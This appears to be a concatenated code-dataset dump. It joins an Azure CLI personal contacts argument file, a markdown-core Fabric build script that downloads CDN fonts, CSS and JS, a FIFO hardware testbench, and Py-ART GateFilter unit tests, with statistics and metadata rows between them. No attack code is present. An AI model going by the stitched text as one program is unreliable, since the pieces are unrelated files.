c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('personalcontacts user-contact create-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('personalcontacts user-contact create-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('personalcontacts user-contact create-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('personalcontacts user-contact delete-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact delete-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact delete-photo') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact delete-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact list-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact list-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact list-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact show-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact show-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact show-photo') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact show-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact update-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('personalcontacts user-contact update-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('personalcontacts user-contact update-photo') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('height', type=int, help='The height of the photo. Read-only.')
c.argument('width', type=int, help='The width of the photo. Read-only.')
with self.argument_context('personalcontacts user-contact update-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
| 76.202918 | 123 | 0.660407 | 7,477 | 57,457 | 4.987161 | 0.033035 | 0.116817 | 0.097348 | 0.072166 | 0.979592 | 0.979592 | 0.979592 | 0.979592 | 0.977849 | 0.97742 | 0 | 0.006113 | 0.199923 | 57,457 | 753 | 124 | 76.304117 | 0.805047 | 0.009329 | 0 | 0.883929 | 0 | 0.017857 | 0.453851 | 0.065818 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001488 | false | 0 | 0.002976 | 0 | 0.004464 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
09f45bbe6b267319bcf428bccb83af84fcecf85d | 9,390 | py | Python | fabfile.py | xingtingyang/markdown-core | fea0414954400bf9ee25c4a50904fe492b08d880 | [
"MIT"
] | null | null | null | fabfile.py | xingtingyang/markdown-core | fea0414954400bf9ee25c4a50904fe492b08d880 | [
"MIT"
] | null | null | null | fabfile.py | xingtingyang/markdown-core | fea0414954400bf9ee25c4a50904fe492b08d880 | [
"MIT"
] | null | null | null | from fabric.api import local
def update():
local('rm -rf node_modules')
local('ncu -ua')
local('npm install')
def fonts():
local('rm -rf dist/fonts/*')
for font in """https://cdn.jsdelivr.net/fontawesome/4.7.0/fonts/fontawesome-webfont.eot
https://cdn.jsdelivr.net/fontawesome/4.7.0/fonts/fontawesome-webfont.svg
https://cdn.jsdelivr.net/fontawesome/4.7.0/fonts/fontawesome-webfont.ttf
https://cdn.jsdelivr.net/fontawesome/4.7.0/fonts/fontawesome-webfont.woff
https://cdn.jsdelivr.net/fontawesome/4.7.0/fonts/fontawesome-webfont.woff2""".split('\n'):
local('cd dist/fonts/ && wget ' + font)
for font in """https://cdn.jsdelivr.net/ionicons/2.0.1/fonts/ionicons.eot
https://cdn.jsdelivr.net/ionicons/2.0.1/fonts/ionicons.svg
https://cdn.jsdelivr.net/ionicons/2.0.1/fonts/ionicons.ttf
https://cdn.jsdelivr.net/ionicons/2.0.1/fonts/ionicons.woff""".split('\n'):
local('cd dist/fonts/ && wget ' + font)
for font in """https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_AMS-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_AMS-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_AMS-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_AMS-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Caligraphic-Bold.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Caligraphic-Bold.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Caligraphic-Bold.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Caligraphic-Bold.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Caligraphic-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Caligraphic-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Caligraphic-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Caligraphic-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Fraktur-Bold.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Fraktur-Bold.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Fraktur-Bold.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Fraktur-Bold.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Fraktur-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Fraktur-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Fraktur-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Fraktur-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Bold.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Bold.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Bold.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Bold.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Italic.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Italic.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Italic.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Italic.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Main-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-BoldItalic.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-BoldItalic.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-BoldItalic.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-BoldItalic.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-Italic.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-Italic.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-Italic.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-Italic.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Math-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Bold.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Bold.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Bold.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Bold.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Italic.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Italic.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Italic.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Italic.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_SansSerif-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Script-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Script-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Script-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Script-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size1-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size1-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size1-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size1-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size2-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size2-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size2-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size2-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size3-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size3-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size3-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size3-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size4-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size4-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size4-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Size4-Regular.woff2
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Typewriter-Regular.eot
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Typewriter-Regular.ttf
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Typewriter-Regular.woff
https://cdn.jsdelivr.net/katex/0.6.0/fonts/KaTeX_Typewriter-Regular.woff2""".split('\n'):
local('cd dist/fonts/ && wget ' + font)
def css():
local('rm -rf dist/*.css')
# github-markdown-css/2.3.0 heading anchor hover style incorrect. didn't upgrade
local('curl https://cdn.jsdelivr.net/github-markdown-css/2.2.1/github-markdown.css > dist/markdown-core.css')
local('curl https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.8.0/styles/atom-one-light.min.css >> dist/markdown-core.css')
local('curl https://cdnjs.cloudflare.com/ajax/libs/emojione/2.2.6/assets/css/emojione.min.css >> dist/markdown-core.css')
local('curl https://cdn.jsdelivr.net/mermaid/6.0.0/mermaid.css >> dist/markdown-core.css')
local('curl https://cdn.jsdelivr.net/fontawesome/4.7.0/css/font-awesome.min.css | sed "s/..\/fonts\//fonts\//g" >> dist/markdown-core.css')
local('curl https://cdn.jsdelivr.net/ionicons/2.0.1/css/ionicons.min.css | sed "s/..\/fonts\//fonts\//g" >> dist/markdown-core.css')
local('curl https://cdn.jsdelivr.net/katex/0.6.0/katex.min.css >> dist/markdown-core.css')
local('cat markdown-core.css >> dist/markdown-core.css')
local('cleancss -o dist/markdown-core.min.css dist/markdown-core.css')
local('rm dist/markdown-core.css')
def js():
local('rm -rf dist/*.js')
local('./node_modules/babel-cli/bin/babel.js markdown-core-node.js > temp.js')
local('browserify temp.js -s mdc > dist/markdown-core.js')
local('rm temp.js')
local('echo "\n" >> dist/markdown-core.js')
local('curl https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js >> dist/markdown-core.js')
local('echo "\n" >> dist/markdown-core.js')
local('curl https://cdn.jsdelivr.net/js-cookie/2.2.0/js.cookie.js >> dist/markdown-core.js')
local('echo "\n" >> dist/markdown-core.js')
local('curl https://cdn.jsdelivr.net/mermaid/6.0.0/mermaid.min.js >> dist/markdown-core.js')
local('echo "\n" >> dist/markdown-core.js')
local('curl https://rawgit.com/asciimath/asciimathml/master/asciimath-based/ASCIIMathTeXImg.js >> dist/markdown-core.js')
local('echo "\n" >> dist/markdown-core.js')
local('cat ./node_modules/chart.js/dist/Chart.min.js >> dist/markdown-core.js')
local('echo "\n" >> dist/markdown-core.js')
local('./node_modules/babel-cli/bin/babel.js markdown-core-browser.js >> dist/markdown-core.js')
local('uglifyjs dist/markdown-core.js -cmo dist/markdown-core.min.js')
local('rm dist/markdown-core.js')
def dist():
local('npm install')
css()
fonts()
js()
def mdm(): # copy dist code to Markdown Mate project
local('cp -f index.html ~/src/swift/markdown-mate/Markdown\ Mate/markdown-core/')
local('cp -rf dist ~/src/swift/markdown-mate/Markdown\ Mate/markdown-core/')
def mdp(): # copy dist code to Markdown Plus project
local('cp -f index.html ~/src/swift/markdown-plus/Markdown\ Plus/markdown-core/')
local('cp -rf dist ~/src/swift/markdown-plus/Markdown\ Plus/markdown-core/')
| 59.808917 | 143 | 0.749308 | 1,664 | 9,390 | 4.177885 | 0.078125 | 0.110472 | 0.220944 | 0.262371 | 0.904919 | 0.88622 | 0.874712 | 0.864787 | 0.843642 | 0.813723 | 0 | 0.03804 | 0.05655 | 9,390 | 156 | 144 | 60.192308 | 0.746698 | 0.016826 | 0 | 0.078014 | 0 | 0.758865 | 0.905505 | 0.10143 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049645 | false | 0 | 0.007092 | 0 | 0.056738 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
61f9011a918273269a31112a186f0e783c3a1667 | 2,766 | py | Python | tests/test_fifo.py | asinghani/wbdbgbus | a1ee94f140cb7c92efc97d8c5906af7df13fe92e | [
"MIT"
] | 1 | 2020-06-21T08:16:33.000Z | 2020-06-21T08:16:33.000Z | tests/test_fifo.py | asinghani/wbdbgbus | a1ee94f140cb7c92efc97d8c5906af7df13fe92e | [
"MIT"
] | null | null | null | tests/test_fifo.py | asinghani/wbdbgbus | a1ee94f140cb7c92efc97d8c5906af7df13fe92e | [
"MIT"
] | null | null | null | from .testbench import Testbench, asserteq
import os
import random
assert os.getcwd().replace("/", "").endswith("sim_build")
WIDTH = 8
DEPTH = 16
def test_fifo():
tb = Testbench("wbdbgbus_fifo.sv", "test_fifo",
params={"WIDTH": WIDTH, "DEPTH": DEPTH})
dut = tb.dut
tb.tick(2)
for i in range(5):
print("Full depth write & readback test")
data = [random.randint(0, 2**WIDTH - 1) for i in range(DEPTH)]
asserteq(dut.o_empty, 1)
for x in data:
dut.i_wr_en = 1
dut.i_wr_data = x
asserteq(dut.o_full, 0)
tb.tick()
asserteq(dut.o_empty, 0)
asserteq(dut.o_full, 1)
dut.i_wr_en = 0
tb.tick()
# Readback
for x in data:
dut.i_rd_en = 1
asserteq(dut.o_empty, 0)
tb.tick()
asserteq(dut.o_rd_data, x)
asserteq(dut.o_full, 0)
asserteq(dut.o_empty, 1)
dut.i_rd_en = 0
tb.tick()
print("Write & reset test")
data = [random.randint(0, 2**WIDTH - 1) for i in range(DEPTH)]
# Write junk data
asserteq(dut.o_empty, 1)
for x in range(5):
dut.i_wr_en = 1
dut.i_wr_data = x
asserteq(dut.o_full, 0)
tb.tick()
asserteq(dut.o_empty, 0)
# Reset
dut.i_wr_en = 0
dut.i_rst = 1
tb.tick()
dut.i_rst = 0
tb.tick()
# Write real data
asserteq(dut.o_empty, 1)
for x in data:
dut.i_wr_en = 1
dut.i_wr_data = x
asserteq(dut.o_full, 0)
tb.tick()
asserteq(dut.o_empty, 0)
asserteq(dut.o_full, 1)
dut.i_wr_en = 0
tb.tick()
# Readback
for x in data:
dut.i_rd_en = 1
asserteq(dut.o_empty, 0)
tb.tick()
asserteq(dut.o_rd_data, x)
asserteq(dut.o_full, 0)
asserteq(dut.o_empty, 1)
dut.i_rd_en = 0
tb.tick()
print("Partial depth write & readback test")
data = [random.randint(0, 2**WIDTH - 1) for i in range(DEPTH // 3)]
asserteq(dut.o_empty, 1)
for x in data:
dut.i_wr_en = 1
dut.i_wr_data = x
asserteq(dut.o_full, 0)
tb.tick()
asserteq(dut.o_empty, 0)
dut.i_wr_en = 0
tb.tick()
# Readback
for x in data:
dut.i_rd_en = 1
asserteq(dut.o_empty, 0)
tb.tick()
asserteq(dut.o_rd_data, x)
asserteq(dut.o_full, 0)
asserteq(dut.o_empty, 1)
dut.i_rd_en = 0
tb.tick()
test_fifo()
| 22.672131 | 75 | 0.490239 | 401 | 2,766 | 3.201995 | 0.127182 | 0.222741 | 0.242991 | 0.185358 | 0.770249 | 0.76324 | 0.76324 | 0.76324 | 0.76324 | 0.738318 | 0 | 0.032993 | 0.397325 | 2,766 | 121 | 76 | 22.859504 | 0.737253 | 0.023138 | 0 | 0.770115 | 0 | 0 | 0.048237 | 0 | 0 | 0 | 0 | 0 | 0.321839 | 1 | 0.011494 | false | 0 | 0.034483 | 0 | 0.045977 | 0.034483 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
1122cc10ca14747a13e1971de56c60d0701722e1 | 84 | py | Python | opac/tests/services/__init__.py | rimphyd/Django-OPAC | d86f2e28fee7f2ec551aeeb98ec67caefc06a3fb | [
"MIT"
] | 1 | 2020-11-26T05:25:46.000Z | 2020-11-26T05:25:46.000Z | opac/tests/services/__init__.py | rimphyd/Django-OPAC | d86f2e28fee7f2ec551aeeb98ec67caefc06a3fb | [
"MIT"
] | null | null | null | opac/tests/services/__init__.py | rimphyd/Django-OPAC | d86f2e28fee7f2ec551aeeb98ec67caefc06a3fb | [
"MIT"
] | null | null | null | from .holding import * # noqa: F401 F403
from .lending import * # noqa: F401 F403
| 28 | 41 | 0.690476 | 12 | 84 | 4.833333 | 0.583333 | 0.344828 | 0.482759 | 0.62069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 0.214286 | 84 | 2 | 42 | 42 | 0.69697 | 0.369048 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
114f3a6c0b6d7f05d964845b5f3264abe31675ca | 11,342 | py | Python | pyart/filters/tests/test_gatefilter.py | josephhardinee/pyart | 909cd4a36bb4cae34349294d2013bc7ad71d0969 | [
"OLDAP-2.6",
"Python-2.0"
] | null | null | null | pyart/filters/tests/test_gatefilter.py | josephhardinee/pyart | 909cd4a36bb4cae34349294d2013bc7ad71d0969 | [
"OLDAP-2.6",
"Python-2.0"
] | null | null | null | pyart/filters/tests/test_gatefilter.py | josephhardinee/pyart | 909cd4a36bb4cae34349294d2013bc7ad71d0969 | [
"OLDAP-2.6",
"Python-2.0"
] | null | null | null | """ Unit tests for Py-ART's correct/filters.py module. """
import numpy as np
from numpy.testing import assert_raises
import pyart
radar = pyart.testing.make_empty_ppi_radar(10, 36, 1)
# a simple field
fdata = np.tile(np.arange(10.), 36).reshape(36, 10)
radar.add_field('test_field', {'data': fdata})
# more
fdata2 = np.ma.masked_array(fdata, copy=True)
fdata2[2, 2] = np.ma.masked
fdata2[3, 3] = np.NAN
fdata2[4, 4] = np.PINF
fdata2[5, 5] = np.NINF
radar.add_field('test_field2', {'data': fdata2})
def test_gatefilter_init():
gfilter = pyart.correct.GateFilter(radar)
assert np.all(gfilter.gate_excluded == np.False_)
def test_gatefilter_exclude_below():
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_below('test_field', 5)
assert gfilter.gate_excluded[0, 0] is np.True_
assert gfilter.gate_excluded[0, -1] is np.False_
gfilter.exclude_below('test_field', 99)
assert gfilter.gate_excluded[0, 0] is np.True_
assert gfilter.gate_excluded[0, -1] is np.True_
def test_gatefilter_exclude_above():
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_above('test_field', 5)
assert gfilter.gate_excluded[0, 0] is np.False_
assert gfilter.gate_excluded[0, -1] is np.True_
gfilter.exclude_above('test_field', -5)
assert gfilter.gate_excluded[0, 0] is np.True_
assert gfilter.gate_excluded[0, -1] is np.True_
def test_gatefilter_exclude_inside():
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_inside('test_field', 2, 5)
assert gfilter.gate_excluded[0, 0] is np.False_
assert gfilter.gate_excluded[0, 3] is np.True_
assert gfilter.gate_excluded[0, -1] is np.False_
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_inside('test_field', 5, 2)
assert gfilter.gate_excluded[0, 0] is np.False_
assert gfilter.gate_excluded[0, 3] is np.True_
assert gfilter.gate_excluded[0, -1] is np.False_
def test_gatefilter_exclude_outside():
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_outside('test_field', 2, 5)
assert gfilter.gate_excluded[0, 0] is np.True_
assert gfilter.gate_excluded[0, 3] is np.False_
assert gfilter.gate_excluded[0, -1] is np.True_
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_outside('test_field', 5, 2)
assert gfilter.gate_excluded[0, 0] is np.True_
assert gfilter.gate_excluded[0, 3] is np.False_
assert gfilter.gate_excluded[0, -1] is np.True_
def test_gatefilter_exclude_equal():
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_equal('test_field', 2)
assert gfilter.gate_excluded[0, 2] is np.True_
assert gfilter.gate_excluded[0, 3] is np.False_
def test_gatefilter_exclude_not_equal():
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_not_equal('test_field', 2)
assert gfilter.gate_excluded[0, 2] is np.False_
assert gfilter.gate_excluded[0, 3] is np.True_
def test_gatefilter_exclude_all():
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_all()
assert np.all(gfilter.gate_excluded == np.True_)
def test_gatefilter_exclude_none():
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_none()
assert np.all(gfilter.gate_excluded == np.False_)
def test_gatefilter_exclude_masked():
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_masked('test_field2')
assert gfilter.gate_excluded[0, 0] is np.False_
assert gfilter.gate_excluded[2, 2] is np.True_
assert gfilter.gate_excluded[3, 3] is np.False_
assert gfilter.gate_excluded[4, 4] is np.False_
assert gfilter.gate_excluded[5, 5] is np.False_
def test_gatefilter_exclude_invalid():
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_invalid('test_field2')
assert gfilter.gate_excluded[0, 0] is np.False_
assert gfilter.gate_excluded[2, 2] is np.True_
assert gfilter.gate_excluded[3, 3] is np.True_
assert gfilter.gate_excluded[4, 4] is np.True_
assert gfilter.gate_excluded[5, 5] is np.True_
def test_gatefilter_exclude_gates():
gfilter = pyart.correct.GateFilter(radar)
gfilter.include_all()
gates = gfilter.gate_excluded
gates[2,0] = np.True_
gates[2,2] = np.True_
gfilter.exclude_gates(gates)
# exclude when included
assert gfilter.gate_excluded[0, 0] is np.False_
assert gfilter.gate_excluded[2, 0] is np.True_
# exclude when already excluded
gfilter.exclude_gates(gates)
assert gfilter.gate_excluded[2, 0] is np.True_
gates[2,0] = np.False_
gates[0,2] = np.True_
# exclude with op='and'
gfilter.exclude_gates(gates, op='and')
assert gfilter.gate_excluded[2, 0] is np.False_
assert gfilter.gate_excluded[0, 2] is np.False_
assert gfilter.gate_excluded[2, 2] is np.True_
def test_gatefilter_ops():
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_below('test_field', 0.5, op='or')
assert gfilter.gate_excluded[0, 0] is np.True_
assert gfilter.gate_excluded[0, 1] is np.False_
assert gfilter.gate_excluded[0, 9] is np.False_
gfilter.exclude_above('test_field', 8.5, op='or')
assert gfilter.gate_excluded[0, 0] is np.True_
assert gfilter.gate_excluded[0, 1] is np.False_
assert gfilter.gate_excluded[0, 9] is np.True_
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_below('test_field', 0.5, op='or')
assert gfilter.gate_excluded[0, 0] is np.True_
assert gfilter.gate_excluded[0, 1] is np.False_
assert gfilter.gate_excluded[0, 9] is np.False_
gfilter.exclude_above('test_field', 8.5, op='and')
assert gfilter.gate_excluded[0, 0] is np.False_
assert gfilter.gate_excluded[0, 1] is np.False_
